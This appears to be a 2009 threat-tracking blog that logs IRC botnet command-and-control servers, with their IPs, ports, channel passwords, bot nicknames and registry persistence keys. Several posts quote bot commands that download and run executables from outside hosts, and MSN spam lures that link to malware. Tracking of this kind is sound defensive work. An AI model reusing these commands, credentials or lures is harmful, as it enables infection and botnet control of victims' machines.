Saturday, July 25, 2009

74.40.134.42 (ms08-067) exploit botnet (BLAZEBOT)

74.40.134.42:9595
Channel: ##esp, ##rus
NICK: {00-RUS-XP-SKLA-1644}
IDENT: MEAT

Posted by Role at 8:52 AM 0 comments  

Wednesday, July 22, 2009

high.jweles.cn (Hidden)

*** IP of : 85.131.154.57 host high.jweles.cn
85.131.154.57:5555

Channel: #!high! h1ghsh1t
@hidz .msn.msg questa è la tua foto?? :P http://myspace-image.info/viewimage.php?=
NICK [00|USA|171262]
USER 2K-8552 * 0 :DDD-4C95834455D
MODE: [00|USA|171262] -ix

Autostart Path
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Windows Update Service = "msupdate32.exe"

Extract Path
"C:\DOCUME~1\User\LOCALS~1\Temp\IXP000.TMP\reptile.exe"
"C:\WINDOWS\msupdate32.exe"

Posted by Role at 6:26 AM 0 comments  

Monday, July 20, 2009

mail.bestservicestores.com

*** IP of : 76.12.178.4 host mail.bestservicestores.com
76.12.178.4:8890
Nick: b0FAkmaUntzFn1EVh65f45Y1m
Username: XP-SP3
Server Pass: fak
Joined Channel: #zUPLEX with Password fuck

Autostart
HKLM\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Shell Extensions Melt
C:\​Zuplex_025725.exe
HKLM\​SYSTEM\​CurrentControlSet\​Control\​SafeBoot\​Minimal Windows Service Control C:\​Documents and Settings\​Administrator\​Application Data\​zupazxx.exe
HKLM\​SYSTEM\​CurrentControlSet\​Control\​SafeBoot\​Network Windows Service Control C:\​Documents and Settings\​Administrator\​Application Data\​zupazxx.exe

Posted by Role at 6:40 AM 0 comments  

Thursday, July 16, 2009

labtec.stupidnsm.cn (Hidden)

*** IP of : 85.131.154.57 host labtec.stupidnsm.cn
85.131.154.57:5555

NICK [00|USA|480852]
USER XP-8638 * 0 :DDD-4C95834455D
MODE [00|USA|480852] -ix
JOIN #!lab! labr0x

The new window was created, as shown below:


Autostart
LM\Software\Microsoft\Windows\CurrentVersion\Run\Windows Dynamic Library Cache "dllcaches.exe"

Posted by Role at 10:02 AM 0 comments  

Wednesday, July 15, 2009

cr4ckr0x.net

*** IP of : 61.136.69.197 host cr4ckr0x.net
61.136.69.197:81

[ Changes to registry ]
* Creates key "HKLM\Software\\Microsoft\\Windows".
* Sets value "Windows Updates"="C:\PROGRA~1\COMMON~1\System\winlogo.exe" in key "HKLM\Software\\Microsoft\\Windows".
* Creates key "HKCU\Software\\Microsoft\\Windows".
* Sets value "Windows Updates"="C:\PROGRA~1\COMMON~1\System\winlogo.exe" in key "HKCU\Software\\Microsoft\\Windows".

Connects to IRC Server.
IRC: Uses nickname mlflODMDdlflhDM.
IRC: Uses username ckmpwuyac.
IRC: Joins channel #scanvnc with password rage.

Posted by Role at 6:58 AM 0 comments  

Tuesday, July 14, 2009

axesor.no-ip.org

*** IP of : 208.77.191.41 host axesor.no-ip.org
208.77.191.41:6667
Nick: pc1426611183
Username: AUT5
Joined Channel: #dbs with Password pwneds
Channel Topic for Channel #dbs: "How knows"

To mark the presence in the system, the following Mutex object was created:
12cFx2FF
The following port was open in the system:

Port Protocol Process
1033 TCP iexplorer.exe (%Windir%\iexplorer.exe)

Posted by Role at 2:56 AM 0 comments  

Monday, July 13, 2009

oao.th3kings.net

*** IP of : 203.154.27.139 host oao.th3kings.net
203.154.27.139:3333
Channel:#!zx!#
Password:zidanag
NICK [00|USA|947039]
USER XP-3986 * 0 :COMPUTERNAME
The newly created Registry Value is:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
windows Live Messenger = "madbbcre.exe"

so that madbbcre.exe runs every time Windows starts

Malware Url
* CK changes topic to '.msn.msg Estas photo so tuyo? http://picture-sex1.com/myfotohi5.exe?='

Posted by Role at 6:26 PM 0 comments  

Thursday, July 9, 2009

kao.th3kings.net

*** IP of : 203.158.16.157 host kao.th3kings.net
203.158.16.157:3333
Channel:#!zx!#
Password:zidanag
NICK [00|USA|654386]
USER XP-6752 * 0 :COMPUTERNAME
Registry Modifications

The newly created Registry Value is:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
windows Live Messenger = "iexplore.exe"

so that iexplore.exe runs every time Windows starts
INSIDE CHANNEL
.msn.msg Estas Foto so Tuyo? http://freevideoporno.net/babygirls.exe?=

Posted by Role at 5:32 AM 0 comments  

Friday, July 3, 2009

ms.update-host.com (Boom)

ms.update-host.com DNS_TYPE_A 66.225.230.213
66.225.230.213:4244
Nick: [00|USA|749660]
Username: XP-9148
Joined Channel: #!msn! with Password ms
Channel Topic for Channel #!msn!: "D http://msngallery.msnmy-pic.com/image.php?="
Private Message to Channel #!msn!: "msn// Thread Activated: Sending Message."
Private Message to Channel #!msn!: "D http://msngallery.msnmy-pic.com/image.php?="
Private Message to Channel #!msn!: "msn// Thread Disabled."
Private Message to Channel #!msn!: ".login poppen -s"

Posted by Role at 9:31 PM 0 comments  

abc.technigoyous.net (hidden)

*** IP of : 218.61.22.10 host abc.technigoyous.net
218.61.22.10:8585
Nick: [00|USA|203945]
Username: XP-3185
Joined Channel: #client1
Channel Topic for Channel #client1: ".r.getfile http://hi5-gallerys.com/loader.exe C:\sdfvinfo.exe 1"
Private Message to Channel #client1: "download// File download: 21.6KB to: C:\sdfvinfo.exe @ 21.6KB/sec."
Private Message to Channel #client1: "download// Created process: "C:\sdfvinfo.exe", PID: <208>"

Posted by Role at 6:52 AM 0 comments  

Wednesday, July 1, 2009

italian.swiifatecihno.com

*** IP of : 218.61.22.10 host italian.swiifatecihno.com

ok changes topic to '.p.karikar http://hi5-gallerys.com/siwa.exe C:\sihd.exe 1 -s'
218.61.22.10:7763
Nick: fUuFaTLM
Username: pjhakt
Joined Channel: #siwa

Posted by Role at 9:20 PM 0 comments  

Subscribe to: Posts (Atom)
Powered by Blogger